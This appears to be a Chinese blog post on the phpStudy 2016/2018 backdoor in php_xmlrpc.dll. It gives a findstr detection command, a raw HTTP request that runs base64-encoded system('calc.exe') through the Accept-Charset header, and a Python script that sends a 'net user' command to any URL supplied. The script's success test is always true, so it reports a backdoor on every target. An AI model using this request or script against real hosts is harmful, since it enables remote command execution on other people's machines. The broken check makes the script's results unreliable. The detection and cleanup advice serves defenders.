最近phpstudy被爆出有后门,当时我还毫不在意,觉得自己不可能…然后,打脸
看着自己的phpstudy2018,数据库突然出问题,才发现自己已经成为别人的肉鸡好多年。。。
快来看看你的phpstudy有没有这样的后门吧
不想复现只想看看的,可以打开cmd,使用命令:
cd phpstudy
findstr /m /s /c:"@eval" *.*
一般找到了,就差不多是有后门了,考虑卸载重新安装官网php或者360木马查杀
复现:
准备工作:win10虚拟机,phpstudy20181102,bp抓包工具
找到PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
记事本打开
搜索:eval,得到:@eval(%s(’%s’)) 一般有这一串就差不多是后门了
启动phpstudy,我的版本是php-5.4.45+apache
exp:
Accept-Charset是命令执行的地方:命令是base64加密后的system(‘calc.exe’);
GET / HTTP/1.1
Host: localhost
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Accept-Encoding:gzip,deflate
Accept-Charset:c3lzdGVtKCdjYWxjLmV4ZScpOw==
Cookie: UM_distinctid=16ae380e49f27e-0987ab403bca49-3c604504-1fa400-16ae380e4a011b; CNZZDATA3801251=cnzz_eid%3D1063495559-1558595034-%26ntime%3D1559102092; CNZZDATA1670348=cnzz_eid%3D213162126-1559207282-%26ntime%3D1559207282
Connection: close
执行:
执行:phpinfo();
base64加密 ----> cGhwaW5mbyUyOCUyOSUzQg==
除了phpstudy2018版本以外,还有phpstudy2016版本
Phpstudy 2016版php-5.4
Phpstudy 2018版php-5.2.17
Phpstudy 2018版php-5.4.45
后门路径为:\php\php-5.2.17\ext\php_xmlrpc.dll
脚本检验:
# -*-coding:utf-8 -*-
import requests
import sys
import base64
def Poc(ip):
payload = "echo \"hello phpstudy\";"
poc = "ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7"
pay = base64.b64encode(payload.encode('utf-8'))
#poc = str(pay,"utf-8")
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Connection": "close",
"Accept-Encoding": "gzip,deflate",
"Accept-Charset": poc,
"Upgrade-Insecure-Requests": "1",
}
url = ip
r = requests.get(url,headers=headers)
#print(r.text)
if "Administrator" or "DefaultAccount" or "Guest" "hello phpstudy"in r.text:
print("存在phpstudy后门")
else:
print("不存在phpstudy后门")
if len(sys.argv) < 2:
print("python phpstudy.py http://127.0.0.1")
else:
Poc(sys.argv[1])
解决办法:360(良心商家)